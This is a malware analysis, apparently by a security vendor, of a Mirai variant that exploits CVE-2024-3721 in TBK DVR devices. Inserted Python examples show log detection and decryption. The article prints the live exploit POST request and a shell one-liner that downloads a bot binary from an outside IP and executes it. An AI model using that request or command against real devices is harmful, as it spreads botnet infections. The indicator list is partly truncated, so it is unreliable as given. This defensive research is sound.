Analysis of the latest Mirai wave exploiting TBK DVR devices with CVE-2024-3721

The abuse of known security flaws to deploy bots on vulnerable systems is a widely recognized problem. Many automated bots constantly search the web for known vulnerabilities in servers and devices connected to the internet, especially those running popular services. These bots often carry Remote Code Execution (RCE) exploits targeting HTTP services, allowing attackers to embed Linux commands within GET or POST requests.

We recently observed the use of CVE-2024-3721 in attempts to deploy a bot in one of our honeypot services. This bot variant turned out to be part of the infamous Mirai botnet, targeting DVR-based monitoring systems. DVR devices are designed to record data from cameras, are widely used by many manufacturers, and can be managed remotely. In this article, we describe the new Mirai bot features and its revamped infection vector.

Exploitation

During a review of the logs in our Linux honeypot system, we noticed an unusual request line linked to CVE-2024-3721. This vulnerability allows the execution of system commands on TBK DVR devices without proper authorization and serves as the entry point, using a specific POST request:

"POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 200 1671 "-" "Mozila/5.0"

The POST request contains a malicious command: a single-line shell script which downloads and executes an ARM32 binary on the compromised machine.

cd /tmp; rm arm7; wget http://42.112.26[.]36/arm7; chmod 777 *; ./arm7 tbk

Typically, bot infections involve shell scripts that initially survey the target machine to determine its architecture and select the corresponding binary.
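Decoding and flagging requests like the one above is easy to script for honeypot or reverse-proxy log review. The following Python is an added example, not code from this article or from Kaspersky: the two log lines are constructed (the first reproduces the request line quoted above, the second is ordinary traffic), and the regular expressions and field names are this example's own choices.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log lines (Combined Log Format). The first reproduces
# the request line quoted in the article; the second is ordinary traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jun/2025:12:00:01 +0000] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 200 1671 "-" "Mozila/5.0"
198.51.100.7 - - [10/Jun/2025:12:00:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# The request line is the first double-quoted field of a log entry
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Shell metacharacters and downloader/loader commands typical of these one-liners
SHELL_RE = re.compile(r"[;&|`$]|\b(?:wget|curl|tftp|chmod|busybox)\b")
URL_RE = re.compile(r"https?://[^\s;|&]+")


def decode_request(line):
    """Split one log line into (method, path, query dict); None if no request line."""
    m = REQUEST_RE.search(line)
    if m is None:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qs percent-decodes each value once, turning %3B back into ';'
    return m.group("method"), parts.path, parse_qs(parts.query, keep_blank_values=True)


def check_line(line):
    """Return details of a suspected CVE-2024-3721 exploitation attempt, or None."""
    decoded = decode_request(line)
    if decoded is None:
        return None
    method, path, query = decoded
    if path != "/device.rsp" or "mdc" not in query:
        return None
    # A second unquote handles payloads that were percent-encoded twice
    command = unquote(query["mdc"][0])
    if not SHELL_RE.search(command):
        return None
    return {
        "method": method,
        "command": command,
        "download_urls": URL_RE.findall(command),
    }


def scan(log_text):
    """Run check_line over every line and keep the hits."""
    return [hit for hit in map(check_line, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["method"], repr(hit["command"]), hit["download_urls"])
```

The check keys on the vulnerable endpoint plus shell metacharacters or downloader commands inside the mdc parameter rather than on this exact payload, so it also flags attempts that fetch a different file name or use another download host; the URLs it extracts are the network indicators to block or pivot on.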
However, in this case, since the attack is specifically targeted at devices that only support ARM32 binaries, the reconnaissance stage is unnecessary.

Malware implant – Mirai variant

The source code of the Mirai botnet was published on the internet nearly a decade ago, and since then it has been adapted and modified by various cybercriminal groups to create large-scale botnets mostly focused on DDoS and resource hijacking.

The DVR bot is also based on the Mirai source code, but it includes additional features as well, such as string encryption using RC4, anti-VM checks, and anti-emulation techniques. We’ve already covered Mirai in many posts, so we’ll focus on the new features of this specific variant.

Data decryption

The data decryption routine in this variant is implemented as a simple RC4 algorithm. The RC4 key is itself encrypted with XOR. After decrypting the key, we obtained its value: 6e7976666525a97639777d2d7f303177.

The decrypted RC4 key is used to decrypt the strings. After each piece of data is decrypted, it is inserted into a vector of a custom DataDecrypted structure, which is a simple string list:

[Figure: Data decryption routine]

The global linked list with decrypted data is accessed whenever the malware needs particular strings.

[Figure: Adding decrypted strings to the global list]

Anti-VM and anti-emulation

To detect whether it is currently running inside a virtual machine or QEMU, the malware lists all processes until it finds any mention of VMware or QEMU-arm. Listing running processes is simply a matter of opening the /proc directory, which is the proc filesystem on Linux. Each process ID (PID) has its own folder containing useful information, such as cmdline, which describes the command used to start the process.
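The two mechanisms just described, RC4 string decryption behind an XOR-masked key and the /proc cmdline scan, are worth reimplementing when triaging a sample or checking whether an analysis VM would trip the check. The Python below is an added example written for this page, not the malware's code or Kaspersky's tooling. It uses the RC4 key value given above and assumes it is 16 raw bytes (the article does not say whether the raw bytes or the hex text is used); the single-byte XOR mask (0x5A), the DataDecrypted layout, the case-insensitive marker match, the sample ciphertexts and the fake /proc tree are all constructed assumptions.

```python
import tempfile
from pathlib import Path

# RC4 key recovered in the article, given there as hex; raw bytes assumed.
RC4_KEY = bytes.fromhex("6e7976666525a97639777d2d7f303177")

# The XOR mask protecting the key is NOT in the article; 0x5A is a constructed
# placeholder, and ENCRYPTED_KEY is derived from it for the demo.
XOR_MASK = 0x5A
ENCRYPTED_KEY = bytes(b ^ XOR_MASK for b in RC4_KEY)


def xor_bytes(data, mask):
    """Single-byte XOR; applying it twice restores the input."""
    return bytes(b ^ mask for b in data)


def rc4(key, data):
    """Textbook RC4 (KSA + PRGA); the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                         # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


class DataDecrypted:
    """Stand-in for the string list the article calls DataDecrypted (layout assumed)."""

    def __init__(self):
        self.strings = []

    def add(self, s):
        self.strings.append(s)
        return len(self.strings) - 1          # index used to fetch it later

    def get(self, index):
        return self.strings[index]


def build_string_table(encrypted_key, mask, blobs):
    """Recover the key, decrypt every blob with it and fill the global list."""
    key = xor_bytes(encrypted_key, mask)
    table = DataDecrypted()
    for blob in blobs:
        table.add(rc4(key, blob).decode("latin-1"))
    return table


# Constructed ciphertexts: plaintexts chosen to match strings the article says
# the bot needs, encrypted here with the same key so the table round-trips.
SAMPLE_PLAINTEXTS = ["/proc/", "cmdline", "VMware", "QEMU-arm"]
SAMPLE_BLOBS = [rc4(RC4_KEY, p.encode()) for p in SAMPLE_PLAINTEXTS]


def read_cmdlines(proc_root):
    """Yield (pid, argv as bytes) for each numeric directory under proc_root."""
    for entry in Path(proc_root).iterdir():
        if not entry.name.isdigit():          # skip self, cpuinfo, ...
            continue
        try:
            raw = (entry / "cmdline").read_bytes()
        except OSError:                       # process exited or unreadable
            continue
        yield int(entry.name), raw.replace(b"\0", b" ").strip()


def find_vm_markers(proc_root, markers):
    """Return (pid, marker, cmdline) for processes whose cmdline holds a marker."""
    hits = []
    for pid, cmdline in read_cmdlines(proc_root):
        for marker in markers:
            if marker.lower().encode() in cmdline.lower():   # case-insensitive (assumed)
                hits.append((pid, marker, cmdline.decode(errors="replace")))
    return hits


def build_demo_proc():
    """Create a constructed /proc lookalike containing one qemu-arm process."""
    base = Path(tempfile.mkdtemp(prefix="fakeproc_"))
    procs = {1: [b"/sbin/init"], 42: [b"/usr/bin/qemu-arm", b"./arm7", b"tbk"]}
    for pid, argv in procs.items():
        (base / str(pid)).mkdir()
        (base / str(pid) / "cmdline").write_bytes(b"\0".join(argv) + b"\0")
    (base / "self").mkdir()                   # non-numeric entry, must be ignored
    return str(base)


def sandbox_would_be_detected(proc_root="/proc"):
    """True if this variant's process scan would find a VM/emulator marker here."""
    table = build_string_table(ENCRYPTED_KEY, XOR_MASK, SAMPLE_BLOBS)
    markers = [table.get(2), table.get(3)]    # "VMware", "QEMU-arm"
    return bool(find_vm_markers(proc_root, markers))


if __name__ == "__main__":
    print("demo /proc detected:", sandbox_would_be_detected(build_demo_proc()))
```

Running sandbox_would_be_detected() with the default /proc inside an analysis VM tells you whether the implant would have bailed out before reaching its command loop; if it returns True, rename or hide the offending process (the user-mode qemu-arm loader is the usual culprit) before re-running the sample.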
Using this information, the malware verifies whether there are any processes with VMware or QEMU-arm in their command line.

[Figure: Process check]

The implant also verifies whether the bot process is running outside an expected directory, based on a hardcoded list of allowed ones:

[Figure: Allowed directories]

Once those checks are successfully completed, Mirai will continue normal execution, preparing the vulnerable device to receive commands from the operator.

Infection statistics

According to our telemetry data, the majority of infected victims are located in countries such as China, India, Egypt, Ukraine, Russia, Turkey, and Brazil. It’s challenging to ascertain the exact number of vulnerable and infected devices globally. However, by analyzing public sources, we’ve identified over 50,000 exposed DVR devices online, indicating that attackers have numerous opportunities to target unpatched, vulnerable devices.

Conclusion

Exploiting known security flaws in IoT devices and servers that haven’t been patched, along with the widespread use of malware targeting Linux-based systems, leads to a significant number of bots constantly searching the internet for devices to infect. The main goal of such bots is to carry out attacks that overwhelm websites and services (DDoS attacks). Most of these bots don’t stay active after the device restarts, because some device firmware doesn’t allow changes to the file system. To protect against infections like these, we recommend updating vulnerable devices as soon as security patches become available. Another thing to consider is a factory reset if your device is indeed vulnerable and exposed.

All Kaspersky products detect the threat as HEUR:Backdoor.Linux.Mirai and HEUR:Backdoor.Linux.Gafgyt.

Indicators of compromise

Host-based (MD5 hashes)

IP addresses
.203.104[.]203
130.61.64[.]122
161.97.219[.]84
130.61.69[.]123
185.84.81[.]194
54.36.111[.]116
192.3.165[.]37
162.243.19[.]47
63.231.92[.]27
80.152.203[.]134
42.112.26[.]36